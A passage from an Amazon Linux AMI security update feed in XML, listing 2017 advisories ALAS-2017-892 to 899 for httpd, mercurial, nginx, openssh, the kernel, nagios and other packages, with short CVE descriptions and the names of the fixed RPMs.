arch="x86_64"><filename>Packages/GraphicsMagick-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.26" release="3.11.amzn1" 
epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.26-3.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-892</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-892: important priority package update for httpd</title><issued date="2017-09-13 22:50:00" /><updated date="2017-09-14 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9788:
It was discovered that the httpd&#039;s mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server.
1470748:
CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest
CVE-2017-7679:
A buffer over-read flaw was found in the httpd&#039;s mod_mime module. A user permitted to modify httpd&#039;s MIME configuration could use this flaw to cause httpd child process to crash.
1463207:
CVE-2017-7679 httpd: mod_mime buffer overread
CVE-2017-3169:
A NULL pointer dereference flaw was found in the httpd&#039;s mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request.
1463197:
CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
CVE-2017-3167:
It was discovered that the use of httpd&#039;s ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd.
1463194:
CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3167" title="" id="CVE-2017-3167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3169" title="" id="CVE-2017-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7679" title="" id="CVE-2017-7679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9788" title="" id="CVE-2017-9788" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_ssl" version="2.2.34" release="1.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.12.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.12.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.12.amzn1" 
epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-893</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-893: important priority package update for mercurial</title><issued date="2017-09-13 22:52:00" /><updated date="2017-09-14 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000116:
A shell command injection flaw related to the handling of &quot;ssh&quot; URLs has been discovered in Mercurial. This can be exploited to execute shell commands with the privileges of the user running the Mercurial client, for example, when performing a &quot;checkout&quot; or &quot;update&quot; action on a sub-repository within a malicious repository or a legitimate repository containing a malicious commit.
1479915:
CVE-2017-1000116 mercurial: command injection on clients through malicious ssh URLs
CVE-2017-1000115:
A vulnerability was found in the way Mercurial handles path auditing and caches the results. An attacker could abuse a repository with a series of commits mixing symlinks and regular files/directories to trick Mercurial into writing outside of a given repository.
1480330:
CVE-2017-1000115 Mercurial: pathaudit: path traversal via symlink
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000115" title="" id="CVE-2017-1000115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000116" title="" id="CVE-2017-1000116" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-python27" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-debuginfo" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-common-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="emacs-mercurial" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="mercurial-python26" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-4.2.3-1.29.amzn1.i686.rpm</filename></package><package 
name="mercurial-debuginfo" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python27-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-4.2.3-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-894</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-894: low priority package update for nginx</title><issued date="2017-09-13 23:19:00" /><updated date="2017-09-14 22:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7529:
A flaw within the processing of ranged HTTP requests has been discovered in the range filter module of nginx. A remote attacker could possibly exploit this flaw to disclose parts of the cache file header, or, if used in combination with third party modules, disclose potentially sensitive memory by sending specially crafted HTTP requests.
1468584:
CVE-2017-7529 nginx: Integer overflow in nginx range filter module leading to memory disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7529" title="" id="CVE-2017-7529" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.12.1" release="1.32.amzn1" epoch="1" 
arch="i686"><filename>Packages/nginx-all-modules-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-stream" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.12.1-1.32.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.12.1" release="1.32.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.12.1-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-895</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-895: important priority package update for aws-cfn-bootstrap</title><issued date="2017-09-14 17:08:00" /><updated date="2017-09-14 22:32:00" /><severity>important</severity><description /><references /><pkglist><collection 
short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="22.14.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-22.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-896</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-896: important priority package update for httpd24 httpd</title><issued date="2017-09-18 15:32:00" /><updated date="2017-09-18 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9798:
Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798" title="" id="CVE-2017-9798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-tools" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.15.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.15.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.15.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.27" release="3.73.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.27-3.73.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.27-3.73.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.73.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/mod24_session-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.73.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.27-3.73.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.73.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.27-3.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-897</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-897: medium priority package update for kernel</title><issued date="2017-09-18 15:41:00" /><updated date="2017-09-18 18:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12134:
The xen_biovec_phys_mergeable function in drivers/xen/biomerge.c in Xen might allow local OS guest users to corrupt block device data streams and consequently obtain sensitive memory information, cause a denial of service, or gain host OS privileges by leveraging incorrect block IO merge-ability calculation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12134" title="" id="CVE-2017-12134" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.43" release="17.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.9.43-17.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.43" release="17.39.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.9.43-17.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-898</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-898: medium priority package update for openssh</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6515:
It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords.
1364935:
CVE-2016-6515 openssh: Denial of service via very long passwords
CVE-2016-6210:
A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses.
1357442:
CVE-2016-6210 openssh: User enumeration via covert timing channel
CVE-2016-10012:
It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process.
1406293:
CVE-2016-10012 openssh: Bounds check can be evaded in the shared memory manager used by pre-authentication compression support
CVE-2016-10011:
It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information.
1406286:
CVE-2016-10011 openssh: Leak of host private key material to privilege-separated child process via realloc()
CVE-2016-10009:
It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent.
1406269:
CVE-2016-10009 openssh: loading of untrusted PKCS#11 modules in ssh-agent
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10009" title="" id="CVE-2016-10009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10011" title="" id="CVE-2016-10011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10012" title="" id="CVE-2016-10012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210" title="" id="CVE-2016-6210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6515" title="" id="CVE-2016-6515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="1.11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" 
release="11.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-11.68.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="1.11.68.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-11.68.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="11.68.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-11.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-899</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-899: important priority package update for nagios</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9566:
A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the &#039;nagios&#039; user/group) could use this flaw to elevate their privileges to root.
1402869:
CVE-2016-9566 nagios: Privilege escalation issue
CVE-2014-5009:
Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2014-5008:
